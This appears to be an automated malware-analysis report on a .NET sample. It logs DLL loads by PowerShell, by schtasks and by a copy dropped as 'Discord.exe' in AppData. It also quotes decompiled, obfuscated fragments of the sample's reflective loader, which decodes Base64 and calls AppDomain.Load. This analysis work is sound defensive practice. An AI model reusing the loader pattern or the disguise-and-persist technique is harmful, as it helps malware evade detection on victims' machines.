Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Discord.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Discord.lnk.0.dr LNK file: ..\..\..\..\..\Discord.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: s3OBQLA3xR.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: s3OBQLA3xR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.v6X5ExXRH3lNTp84b4b8XfUON3Cu9S8ohF2pVtHLLDQMs6SjXs8nIJCi1kZ9QA2zKwVi2Z3HbICIB4N0tUm,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.RAktkBmjHI5enPkjYsNL1670bUFsHQppKzSAaipnX3ERPqGVTVsXYCBLaWcjEU4KjefLH7muPxmmCYP8VYo,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.F6kC2uEC72v4mrWg4NpIvtH1qfkJVrstqNYXDaxaQZNFb6njAiTvvxZzi8I5sctac1gblxFukrhrdQTpSq3,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.et606mk5fqvKytaw7f76wM4ki8OfP7x9Rr4ewcP74LjE6EsDwlrH98M7vQ12rHTRUEORZbuSHkON1U11BbL,U9pHMOisPp.Sla7w63Sq2()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2],U9pHMOisPp.Dr8WIudrtM(Convert.FromBase64String(ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.v6X5ExXRH3lNTp84b4b8XfUON3Cu9S8ohF2pVtHLLDQMs6SjXs8nIJCi1kZ9QA2zKwVi2Z3HbICIB4N0tUm,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.RAktkBmjHI5enPkjYsNL1670bUFsHQppKzSAaipnX3ERPqGVTVsXYCBLaWcjEU4KjefLH7muPxmmCYP8VYo,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.F6kC2uEC72v4mrWg4NpIvtH1qfkJVrstqNYXDaxaQZNFb6njAiTvvxZzi8I5sctac1gblxFukrhrdQTpSq3,_1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.et606mk5fqvKytaw7f76wM4ki8OfP7x9Rr4ewcP74LjE6EsDwlrH98M7vQ12rHTRUEORZbuSHkON1U11BbL,U9pHMOisPp.Sla7w63Sq2()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2],U9pHMOisPp.Dr8WIudrtM(Convert.FromBase64String(ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { ddSPMX7Hq54DZlnQIudeqi5dcl6NSIm3cMpFdj5H3XoKJBQo3yjRz1XImrSVHXzqN3rM[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB System.AppDomain.Load(byte[])
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av System.AppDomain.Load(byte[])
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB System.AppDomain.Load(byte[])
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av System.AppDomain.Load(byte[])
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs .Net Code: r9hz4Y205wmqSfrAQf0pAJLA2gMvIt0jQwqrolFAbOuIJBlhEaF4ZhfIP7XOxbnKY0Av
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B6DD2A5 pushad ; iretd 1_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8C2316 push 8B485F92h; iretd 1_2_00007FFD9B8C231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B6ED2A5 pushad ; iretd 4_2_00007FFD9B6ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B8019D2 pushad ; ret 4_2_00007FFD9B8019E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B8000AD pushad ; iretd 4_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B8D2316 push 8B485F91h; iretd 4_2_00007FFD9B8D231B
